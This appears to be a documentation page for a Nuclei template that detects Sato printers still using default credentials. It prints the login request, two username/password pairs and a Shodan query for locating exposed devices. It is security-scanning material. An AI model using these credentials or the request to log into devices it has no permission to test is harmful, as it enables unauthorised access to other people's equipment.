Sato - Default Login
ID: sato-default-login
Severity: high
Author: y0no
Tags: sato,default-login,printer
Description
Section titled “Description”Sato using default credentials was discovered.
YAML Source
Section titled “YAML Source”id: sato-default-login
info: name: Sato - Default Login author: y0no severity: high description: | Sato using default credentials was discovered. metadata: verified: true max-request: 1 shodan-query: title:"Sato" tags: sato,default-login,printer
http: - raw: - | POST /WebConfig/lua/auth.lua HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}
group={{username}}&pw={{password}}
attack: pitchfork
payloads: username: - 'settings' - 'service' password: - '0310' - '6677'
matchers-condition: and matchers: - type: word part: body words: - '"r":0' - 'groups":["user' condition: and
- type: word part: content_type words: - 'application/json'
- type: status status: - 200# digest: 4b0a00483046022100abd9d57638e9be776bb8f11d78a8d265db8486cdf7787116709d26499d043693022100e67d02026703027ff5a0b1f7c23c1e68650d3e275a7073cb86831e423b82e340:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/sato/sato-default-login.yaml"